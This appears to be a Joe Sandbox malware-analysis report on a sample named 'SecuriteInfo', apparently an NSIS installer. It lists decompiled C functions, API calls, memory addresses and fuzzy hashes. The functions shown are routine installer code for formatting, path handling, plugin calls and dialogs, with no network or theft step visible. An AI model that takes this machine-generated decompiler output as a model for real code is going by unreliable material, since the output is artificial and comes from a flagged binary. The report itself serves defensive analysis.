Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}

0x00404d4f
0x00404d54
0x00404d5c
0x00404d5d
0x00404d6a
0x00404d72
0x00404d73
0x00404d75
0x00404d77
0x00404d79
0x00404d7c
0x00404d7c
0x00404d83
0x00404d89
0x00404d89
0x00404d90
0x00404d97
0x00404d9a
0x00404d9d
0x00404d9d
0x00404da1
0x00404db1
0x00404db3
0x00404db6
0x00404d5f
0x00404d5f
0x00404d66
0x00404d66
0x00404dbe
0x00404dc9
0x00404ddf
0x00404df0
0x00404e0c

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
wsprintfW.USER32 ref: 00404DF0
SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

%u.%u%s%s, xrefs: 00404DD1

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405E0C(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405e0d
0x00405e1a
0x00405e1b
0x00405e26
0x00405e2e
0x00405e2e
0x00405e36

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD

Uniqueness

Uniqueness Score: -1.00%

Function 6F3D10E1 Relevance: 6.4, APIs: 5, Instructions: 145
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E6F3D10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x6f3d506c = _a8;
				 *0x6f3d5070 = _a16;
				 *0x6f3d5074 = _a12;
				_a12( *0x6f3d5048, E6F3D1651, _t73);
				_t66 =  *0x6f3d506c +  *0x6f3d506c * 4 << 3;
				_t27 = E6F3D12E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x6f3d5040;
							if( *0x6f3d5040 == 0) {
								goto L26;
							}
							E6F3D1603( *0x6f3d5074, _t31 + 4, _t66);
							_t34 =  *0x6f3d5040;
							_t86 = _t86 + 0xc;
							 *0x6f3d5040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E6F3D1312(E6F3D135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E6F3D1381(_t80, E6F3D12E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E6F3D1603(_t10,  *0x6f3d5074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x6f3d5040;
							 *0x6f3d5040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x6f3d5070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E6F3D1603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x6f3d506c +  *0x6f3d506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E6F3D1603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x6f3d5070);
						 *( *0x6f3d5070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}

0x6f3d10eb
0x6f3d1100
0x6f3d1109
0x6f3d110e
0x6f3d1119
0x6f3d111c
0x6f3d1125
0x6f3d1129
0x6f3d112b
0x6f3d12b0
0x6f3d12ba
0x6f3d12ba
0x6f3d1132
0x6f3d1132
0x6f3d1137
0x6f3d1138
0x6f3d113a
0x6f3d113d
0x6f3d1256
0x6f3d1259
0x6f3d1271
0x6f3d1271
0x6f3d1278
0x00000000
0x00000000
0x6f3d1285
0x6f3d128a
0x6f3d128f
0x6f3d1294
0x6f3d129a
0x6f3d129b
0x00000000
0x6f3d129b
0x6f3d125b
0x6f3d125e
0x6f3d11bc
0x6f3d11bf
0x6f3d11c2
0x6f3d11cb
0x6f3d11d0
0x00000000
0x6f3d11d1
0x6f3d1264
0x6f3d1266
0x6f3d11a2
0x6f3d11a5
0x6f3d11a8
0x6f3d11b1
0x00000000
0x6f3d11b1
0x6f3d1164
0x6f3d1165
0x6f3d1177
0x6f3d1180
0x6f3d1184
0x6f3d118e
0x6f3d1191
0x6f3d1193
0x6f3d1193
0x00000000
0x6f3d1165
0x6f3d1143
0x6f3d1218
0x6f3d121d
0x6f3d1221
0x6f3d1223
0x6f3d122c
0x6f3d122f
0x6f3d1238
0x6f3d123d
0x6f3d123d
0x6f3d1247
0x6f3d124a
0x00000000
0x6f3d1250
0x6f3d1149
0x6f3d114c
0x6f3d11e9
0x6f3d11ed
0x6f3d11f7
0x6f3d11fb
0x6f3d1205
0x6f3d120a
0x6f3d1211
0x00000000
0x6f3d1211
0x6f3d1152
0x6f3d1155
0x00000000
0x00000000
0x6f3d115b
0x6f3d115e
0x6f3d11b8
0x00000000
0x6f3d11b8
0x6f3d1160
0x6f3d1162
0x6f3d119e
0x00000000
0x6f3d119e
0x00000000
0x6f3d12a1
0x6f3d12a1
0x6f3d12ab
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6F3D1171
GlobalAlloc.KERNEL32(00000040,?), ref: 6F3D11E3
GlobalFree.KERNEL32 ref: 6F3D124A
GlobalFree.KERNEL32(?), ref: 6F3D129B
GlobalFree.KERNEL32(00000000), ref: 6F3D12B1

Memory Dump Source

Source File: 00000001.00000002.18505223638.000000006F3D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F3D0000, based on PE: true

Associated: 00000001.00000002.18505136073.000000006F3D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505336167.000000006F3D4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505402042.000000006F3D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f3d0000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: d4b50936b0e697c1edda20d4bd4bcc684d5eed4175a0030f273acebd00ea9f1b
Instruction ID: 5134fac9560861bcb38a4a6018b4044b48715fecb66e1078c17f7b88c5f6de21
Opcode Fuzzy Hash: d4b50936b0e697c1edda20d4bd4bcc684d5eed4175a0030f273acebd00ea9f1b
Instruction Fuzzy Hash: 80515EB6900706DFFB40EF78C945A6677ECFB0A726B04851AF944DB250E736E920CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nsd7AB8.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsd7AB8.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsd7AB8.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf0 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040649D(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsd7AB8.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x0040263e
0x0040263e
0x0040263e
0x00402643
0x00402646
0x00402649
0x0040264e
0x00402650
0x00402670
0x004026aa
0x00402672
0x00402674
0x00402688
0x00402695
0x00402695
0x00402652
0x00402654
0x00402659
0x00402667
0x0040266a
0x004026af
0x004026b2
0x0040292e
0x0040292e
0x004026b8
0x004026c1
0x004026c3
0x004026e2
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026c3
0x00402c2d
0x00402c39

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC
C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp, xrefs: 00402683

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp$C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll
API String ID: 1659193697-2665288152
Opcode ID: a2d9691ea381e88d042a05527e8249a96b52758ce21b98351f65b3f5d82e54dc
Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
Opcode Fuzzy Hash: a2d9691ea381e88d042a05527e8249a96b52758ce21b98351f65b3f5d82e54dc
Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x42aa20; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x434f0c;
						if(_t2 >  *0x434f0c) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x42aa20; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}

0x00403020
0x0040303a
0x00403040
0x0040304a
0x00403050
0x00403056
0x00403067
0x00403070
0x00000000
0x00403075
0x0040307c
0x00403042
0x00403049
0x00403049
0x00403022
0x00403022
0x00403029
0x0040302c
0x0040302c
0x00403032
0x00403039
0x00403039

APIs

DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x42fa70, _a4);
				_t21 = E00405EB7(0x42fa70);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x434f18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405f20
0x00405f2b
0x00405f2f
0x00405f36
0x00405f42
0x00405f52
0x00405f54
0x00405f6c
0x00405f6d
0x00405f74
0x00405f75
0x00000000
0x00000000
0x00405f58
0x00405f5f
0x00405f67
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f5f
0x00405f77
0x00000000
0x00405f8b
0x00405f44
0x00405f4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f4a
0x00405f31
0x00000000

APIs

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,758D3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,758D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,758D3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,758D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,758D3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,758D3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3355392842
Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE

Uniqueness

Uniqueness Score: -1.00%

Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}

0x00405517
0x00405521
0x0040553d
0x0040555f
0x00405562
0x00405568
0x00405572
0x00405573
0x00405575
0x0040557b
0x0040557b
0x00405585
0x00000000
0x00405593
0x0040554a
0x00405582
0x00405582
0x00000000
0x00405582
0x00405556
0x00405558
0x00000000
0x00405558
0x00405527
0x00000000
0x00000000
0x0040552e
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405542
CallWindowProcW.USER32(?,?,?,?), ref: 00405593

Part of subcall function 004044E5: SendMessageW.USER32(000103DC,00000000,00000000,00000000), ref: 004044F7

Strings

, xrefs: 00405523

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
